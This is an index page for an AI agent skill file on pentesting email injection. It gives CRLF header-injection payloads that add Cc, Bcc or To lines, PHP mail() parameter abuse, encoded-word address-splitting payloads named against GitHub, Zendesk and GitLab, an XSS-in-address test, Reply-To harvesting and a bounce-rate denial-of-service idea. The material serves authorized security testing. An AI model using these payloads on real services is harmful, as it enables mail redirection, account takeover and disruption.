OpenSkillIndex← back to search

Hacktricks-skills email-injection-pentest

How to identify and test email injection vulnerabilities in web applications. Use this skill whenever the user mentions email injection, header injection, PHP mail exploitation, email bypass techniques, SSO email attacks, or any email-related security testing. This includes testing for Cc/Bcc injection, To header manipulation, subject/body injection, PHP mail() function abuse, email name bypass techniques, and third-party SSO email attacks.

install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/pentesting-web/email-injections/SKILL.MD
source content

Email Injection Pentesting

A comprehensive guide for identifying and testing email injection vulnerabilities in web applications.

Quick Reference

Header Injection Payloads

Cc/Bcc Injection (after sender):

From:sender@domain.com%0ACc:recipient@domain.co,%0ABcc:recipient1@domain.com

To Header Injection:

From:sender@domain.com%0ATo:attacker@domain.com

Subject Injection:

From:sender@domain.com%0ASubject:This is%20Fake%20Subject

Body Injection (two-line feed):

From:sender@domain.com%0A%0AMy%20New%20Fake%20Message.

Testing Methodology

1. Identify Email Injection Points

Look for these common vectors:

  • Contact forms with email fields
  • Password reset functionality
  • User registration with email verification
  • Newsletter subscription forms
  • Any form that sends emails on submission

2. Test Header Injection

Step 1: Inject Cc/Bcc headers

  • Add 
    %0ACc:attacker@domain.com
    after the email field value
  • Add 
    %0ABcc:attacker@domain.com
    to test blind injection
  • Monitor attacker email for received messages

Step 2: Inject To header

  • Add 
    %0ATo:attacker@domain.com
    to send copy to attacker
  • Original recipient still receives email

Step 3: Test Subject/Body manipulation

  • Use 
    %0ASubject:
    to inject fake subjects
  • Use 
    %0A%0A
    (two CRLFs) to inject body content

3. PHP mail() Function Exploitation

The PHP 

mail()
function signature:

mail($to, $subject, $message, $additional_headers, $additional_parameters)

$additional_parameters exploitation:

  • This parameter is passed to sendmail command line
  • Sanitized with 
    escapeshellcmd()
    but still exploitable
  • Can inject sendmail-specific parameters

MTA-specific attacks:

  • Sendmail, Postfix, Exim have different parameter sets
  • Some allow file leakage or command execution
  • Research the specific MTA for targeted attacks

4. Email Name Injection Techniques

Ignored Characters:

  • +
    and 
    -
    symbols (tagging)
  • {}
    in rare cases
  • Comments in parentheses 
    ()

Examples:

john.doe+intigriti@example.com → john.doe@example.com
john.doe(intigriti)@example.com → john.doe@example.com

IP Address Domains:

john.doe@[127.0.0.1]
john.doe@[IPv6:2001:db8::1]

Email Encoding Bypass:

Format: 

=?encoding?method?encoded_data?=domain.com

Common encodings:

# Quoted-printable UTF-8
=?utf-8?q?=61=62=63?=hi@example.com → abc@hi@example.com

# Base64 UTF-8
=?utf-8?b?QUJD?=hi@example.com → ABC@hi@example.com

# Punycode
x@xn--svg/-9x6 → x@<svg/

Known Working Payloads:

PlatformPayloadResult
GitHub
=?x?q?collab=40psres.net=3e=00?=foo@example.com
Sends to collab@psres.net
Zendesk
"=?x?q?collab=22=40psres.net=3e=00==3c22x?="@example.com
Sends to collab@psres.net
GitLab
=?x?q?collab=40psres.net_?=foo@example.com
Sends to collab@psres.net

5. Third-Party SSO Attacks

XSS via Email:

  • Some services (GitHub, Salesforce) allow XSS payloads in email addresses
  • If target service doesn't sanitize, XSS can occur
  • Test with: 
    <script>alert(1)</script>@domain.com

Account Takeover:

  • Create account on SSO provider without email verification
  • Use that account to login to trusting services
  • Salesforce is known to allow this (shows verification status)

6. Reply-To Abuse

Technique:

From: company.com
Reply-To: attacker.com

Impact:

  • Automatic replies (out of office, bounces) go to attacker
  • Can harvest internal email addresses
  • May receive sensitive auto-generated responses

7. Hard Bounce Rate Manipulation

AWS SES Threshold: 10% hard bounce rate

What is a hard bounce:

  • Email returned due to invalid/non-existent recipient
  • Domain doesn't exist
  • Recipient server refuses email

Impact:

  • Exceeding 10% triggers service suspension
  • Can be used for denial-of-service against email services
  • Monitor bounce rates in email delivery services

Tooling

Burp Suite

  • Turbo Intruder: Fuzz email format combinations
  • Hackvertor: Create email splitting attacks

Manual Testing

  • Use URL encoding for special characters
  • Test with various MTA configurations
  • Monitor attacker email addresses for results

Reporting

When documenting email injection findings:

  1. Vulnerability Type: Header injection, name injection, SSO abuse, etc.
  2. Impact: Information disclosure, account takeover, spam relay, etc.
  3. Proof of Concept: Include exact payload and observed behavior
  4. Affected Endpoints: List all vulnerable forms/parameters
  5. Remediation: Input validation, parameterized email functions, allowlists

References

Safety Notes

  • Only test systems you have authorization to assess
  • Use controlled test environments when possible
  • Monitor for unintended email delivery to real users
  • Document all testing for compliance purposes